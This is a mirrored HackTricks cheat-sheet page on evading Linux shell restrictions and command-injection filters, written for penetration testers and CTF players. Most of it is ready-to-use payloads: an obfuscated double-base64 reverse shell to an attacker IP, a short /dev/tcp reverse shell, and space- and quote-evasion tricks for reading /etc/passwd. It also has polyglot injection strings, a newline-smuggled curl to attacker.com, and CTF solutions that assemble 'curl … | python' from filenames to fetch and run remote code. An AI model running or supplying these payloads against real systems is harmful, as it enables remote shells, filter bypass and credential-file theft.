mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	
		
			
				
	
	
		
			395 lines
		
	
	
		
			13 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			395 lines
		
	
	
		
			13 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
| # Bypass Linux Restrictions
 | |
| 
 | |
| {% hint style="success" %}
 | |
| Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 | |
| Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 | |
| 
 | |
| <details>
 | |
| 
 | |
| <summary>Support HackTricks</summary>
 | |
| 
 | |
| * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 | |
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 | |
| * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 | |
| 
 | |
| </details>
 | |
| {% endhint %}
 | |
| 
 | |
| <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | |
| 
 | |
| \
 | |
| Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 | |
| Get Access Today:
 | |
| 
 | |
| {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 | |
| 
 | |
| ## Common Limitations Bypasses
 | |
| 
 | |
| ### Reverse Shell
 | |
| 
 | |
| ```bash
 | |
| # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
 | |
| echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
 | |
| # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
 | |
| ```
 | |
| 
 | |
| ### Short Rev shell
 | |
| 
 | |
| ```bash
 | |
| #Trick from Dikline
 | |
| #Get a rev shell with
 | |
| (sh)0>/dev/tcp/10.10.10.10/443
 | |
| #Then get the out of the rev shell executing inside of it:
 | |
| exec >&0
 | |
| ```
 | |
| 
 | |
| ### Bypass Paths and forbidden words
 | |
| 
 | |
| ```bash
 | |
| # Question mark binary substitution
 | |
| /usr/bin/p?ng # /usr/bin/ping
 | |
| nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
 | |
| 
 | |
| # Wildcard(*) binary substitution
 | |
| /usr/bin/who*mi # /usr/bin/whoami
 | |
| 
 | |
| # Wildcard + local directory arguments
 | |
| touch -- -la # -- stops processing options after the --
 | |
| ls *
 | |
| echo * #List current files and folders with echo and wildcard
 | |
| 
 | |
| # [chars]
 | |
| /usr/bin/n[c] # /usr/bin/nc
 | |
| 
 | |
| # Quotes
 | |
| 'p'i'n'g # ping
 | |
| "w"h"o"a"m"i # whoami
 | |
| ech''o test # echo test
 | |
| ech""o test # echo test
 | |
| bas''e64 # base64
 | |
| 
 | |
| #Backslashes
 | |
| \u\n\a\m\e \-\a # uname -a
 | |
| /\b\i\n/////s\h
 | |
| 
 | |
| # $@
 | |
| who$@ami #whoami
 | |
| 
 | |
| # Transformations (case, reverse, base64)
 | |
| $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
 | |
| $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
 | |
| $(rev<<<'imaohw') #whoami
 | |
| bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
 | |
| 
 | |
| 
 | |
| # Execution through $0
 | |
| echo whoami|$0
 | |
| 
 | |
| # Uninitialized variables: A uninitialized variable equals to null (nothing)
 | |
| cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
 | |
| p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
 | |
| 
 | |
| # Fake commands
 | |
| p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
 | |
| w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
 | |
| 
 | |
| # Concatenation of strings using history
 | |
| !-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
 | |
| mi # This will throw an error
 | |
| whoa # This will throw an error
 | |
| !-1!-2 # This will execute whoami
 | |
| ```
 | |
| 
 | |
| ### Bypass forbidden spaces
 | |
| 
 | |
| ```bash
 | |
| # {form}
 | |
| {cat,lol.txt} # cat lol.txt
 | |
| {echo,test} # echo test
 | |
| 
 | |
| # IFS - Internal field separator, change " " for any other character ("]" in this case)
 | |
| cat${IFS}/etc/passwd # cat /etc/passwd
 | |
| cat$IFS/etc/passwd # cat /etc/passwd
 | |
| 
 | |
| # Put the command line in a variable and then execute it
 | |
| IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
 | |
| IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
 | |
| IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
 | |
| #  Other way, just change each space for ${IFS}
 | |
| echo${IFS}test
 | |
| 
 | |
| # Using hex format
 | |
| X=$'cat\x20/etc/passwd'&&$X
 | |
| 
 | |
| # Using tabs
 | |
| echo "ls\x09-l" | bash
 | |
| 
 | |
| # New lines
 | |
| p\
 | |
| i\
 | |
| n\
 | |
| g # These 4 lines will equal to ping
 | |
| 
 | |
| # Undefined variables and !
 | |
| $u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
 | |
| uname!-1\-a # This equals to uname -a
 | |
| ```
 | |
| 
 | |
| ### Bypass backslash and slash
 | |
| 
 | |
| ```bash
 | |
| cat ${HOME:0:1}etc${HOME:0:1}passwd
 | |
| cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
 | |
| ```
 | |
| 
 | |
| ### Bypass pipes
 | |
| 
 | |
| ```bash
 | |
| bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
 | |
| ```
 | |
| 
 | |
| ### Bypass with hex encoding
 | |
| 
 | |
| ```bash
 | |
| echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
 | |
| cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
 | |
| abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
 | |
| `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
 | |
| cat `xxd -r -p <<< 2f6574632f706173737764`
 | |
| xxd -r -ps <(echo 2f6574632f706173737764)
 | |
| cat `xxd -r -ps <(echo 2f6574632f706173737764)`
 | |
| ```
 | |
| 
 | |
| ### Bypass IPs
 | |
| 
 | |
| ```bash
 | |
| # Decimal IPs
 | |
| 127.0.0.1 == 2130706433
 | |
| ```
 | |
| 
 | |
| ### Time based data exfiltration
 | |
| 
 | |
| ```bash
 | |
| time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 | |
| ```
 | |
| 
 | |
| ### Getting chars from Env Variables
 | |
| 
 | |
| ```bash
 | |
| echo ${LS_COLORS:10:1} #;
 | |
| echo ${PATH:0:1} #/
 | |
| ```
 | |
| 
 | |
| ### DNS data exfiltration
 | |
| 
 | |
| You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
 | |
| 
 | |
| ### Builtins
 | |
| 
 | |
| In case you cannot execute external functions and only have access to a **limited set of builtins to obtain RCE**, there are some handy tricks to do it. Usually you **won't be able to use all** of the **builtins**, so you should **know all your options** to try to bypass the jail. Idea from [**devploit**](https://twitter.com/devploit).\
 | |
| First of all check all the [**shell builtins**](https://www.gnu.org/software/bash/manual/html\_node/Shell-Builtin-Commands.html)**.** Then here you have some **recommendations**:
 | |
| 
 | |
| ```bash
 | |
| # Get list of builtins
 | |
| declare builtins
 | |
| 
 | |
| # In these cases PATH won't be set, so you can try to set it
 | |
| PATH="/bin" /bin/ls
 | |
| export PATH="/bin"
 | |
| declare PATH="/bin"
 | |
| SHELL=/bin/bash
 | |
| 
 | |
| # Hex
 | |
| $(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
 | |
| $(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
 | |
| 
 | |
| # Input
 | |
| read aaa; exec $aaa #Read more commands to execute and execute them
 | |
| read aaa; eval $aaa
 | |
| 
 | |
| # Get "/" char using printf and env vars
 | |
| printf %.1s "$PWD"
 | |
| ## Execute /bin/ls
 | |
| $(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
 | |
| ## To get several letters you can use a combination of printf and
 | |
| declare
 | |
| declare functions
 | |
| declare historywords
 | |
| 
 | |
| # Read flag in current dir
 | |
| source f*
 | |
| flag.txt:1: command not found: CTF{asdasdasd}
 | |
| 
 | |
| # Read file with read
 | |
| while read -r line; do echo $line; done < /etc/passwd
 | |
| 
 | |
| # Get env variables
 | |
| declare
 | |
| 
 | |
| # Get history
 | |
| history
 | |
| declare history
 | |
| declare historywords
 | |
| 
 | |
| # Disable special builtins chars so you can abuse them as scripts
 | |
| [ #[: ']' expected
 | |
| ## Disable "[" as builtin and enable it as script
 | |
| enable -n [
 | |
| echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
 | |
| chmod +x [
 | |
| export PATH=/tmp:$PATH
 | |
| if [ "a" ]; then echo 1; fi # Will print hello!
 | |
| ```
 | |
| 
 | |
| ### Polyglot command injection
 | |
| 
 | |
| ```bash
 | |
| 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 | |
| /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
 | |
| ```
 | |
| 
 | |
| ### Bypass potential regexes
 | |
| 
 | |
| ```bash
 | |
| # A regex that only allow letters and numbers might be vulnerable to new line characters
 | |
| 1%0a`curl http://attacker.com`
 | |
| ```
 | |
| 
 | |
| ### Bashfuscator
 | |
| 
 | |
| ```bash
 | |
| # From https://github.com/Bashfuscator/Bashfuscator
 | |
| ./bashfuscator -c 'cat /etc/passwd'
 | |
| ```
 | |
| 
 | |
| ### RCE with 5 chars
 | |
| 
 | |
| ```bash
 | |
| # From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
 | |
| #Oragnge Tsai solution
 | |
| ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
 | |
| http://host/?cmd=>ls\
 | |
| http://host/?cmd=ls>_
 | |
| http://host/?cmd=>\ \
 | |
| http://host/?cmd=>-t\
 | |
| http://host/?cmd=>\>g
 | |
| http://host/?cmd=ls>>_
 | |
| 
 | |
| ## Step2: generate `curl orange.tw|python` to file "g"
 | |
| ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
 | |
| http://host/?cmd=>on
 | |
| http://host/?cmd=>th\
 | |
| http://host/?cmd=>py\
 | |
| http://host/?cmd=>\|\
 | |
| http://host/?cmd=>tw\
 | |
| http://host/?cmd=>e.\
 | |
| http://host/?cmd=>ng\
 | |
| http://host/?cmd=>ra\
 | |
| http://host/?cmd=>o\
 | |
| http://host/?cmd=>\ \
 | |
| http://host/?cmd=>rl\
 | |
| http://host/?cmd=>cu\
 | |
| http://host/?cmd=sh _
 | |
| # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
 | |
| 
 | |
| ## Finally execute the file "g"
 | |
| http://host/?cmd=sh g
 | |
| 
 | |
| 
 | |
| # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
 | |
| # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
 | |
| https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
 | |
| ## Execute tar command over a folder
 | |
| http://52.199.204.34/?cmd=>tar
 | |
| http://52.199.204.34/?cmd=>zcf
 | |
| http://52.199.204.34/?cmd=>zzz
 | |
| http://52.199.204.34/?cmd=*%20/h*
 | |
| 
 | |
| # Another curiosity if you can read files of the current folder
 | |
| ln /f*
 | |
| ## If there is a file /flag.txt that will create a hard link 
 | |
| ## to it in the current folder
 | |
| ```
 | |
| 
 | |
| ### RCE with 4 chars
 | |
| 
 | |
| ```bash
 | |
| # In a similar fashion to the previous bypass this one just need 4 chars to execute commands
 | |
| # it will follow the same principle of creating the command `ls -t>g` in a file
 | |
| # and then generate the full command in filenames
 | |
| # generate "g> ht- sl" to file "v"
 | |
| '>dir'
 | |
| '>sl'
 | |
| '>g\>'
 | |
| '>ht-'
 | |
| '*>v'
 | |
| 
 | |
| # reverse file "v" to file "x", content "ls -th >g"
 | |
| '>rev'
 | |
| '*v>x'
 | |
| 
 | |
| # generate "curl orange.tw|python;"
 | |
| '>\;\\'
 | |
| '>on\\'
 | |
| '>th\\'
 | |
| '>py\\'
 | |
| '>\|\\'
 | |
| '>tw\\'
 | |
| '>e.\\'
 | |
| '>ng\\'
 | |
| '>ra\\'
 | |
| '>o\\'
 | |
| '>\ \\'
 | |
| '>rl\\'
 | |
| '>cu\\'
 | |
| 
 | |
| # got shell
 | |
| 'sh x'
 | |
| 'sh g'
 | |
| ```
 | |
| 
 | |
| ## Read-Only/Noexec/Distroless Bypass
 | |
| 
 | |
| If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:**
 | |
| 
 | |
| {% content-ref url="../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/" %}
 | |
| [bypass-fs-protections-read-only-no-exec-distroless](../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/)
 | |
| {% endcontent-ref %}
 | |
| 
 | |
| ## Chroot & other Jails Bypass
 | |
| 
 | |
| {% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %}
 | |
| [escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md)
 | |
| {% endcontent-ref %}
 | |
| 
 | |
| ## References & More
 | |
| 
 | |
| * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
 | |
| * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
 | |
| * [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
 | |
| * [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
 | |
| 
 | |
| <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | |
| 
 | |
| \
 | |
| Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 | |
| Get Access Today:
 | |
| 
 | |
| {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 | |
| 
 | |
| {% hint style="success" %}
 | |
| Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 | |
| Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 | |
| 
 | |
| <details>
 | |
| 
 | |
| <summary>Support HackTricks</summary>
 | |
| 
 | |
| * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 | |
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 | |
| * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 | |
| 
 | |
| </details>
 | |
| {% endhint %}
 | |
| 
 |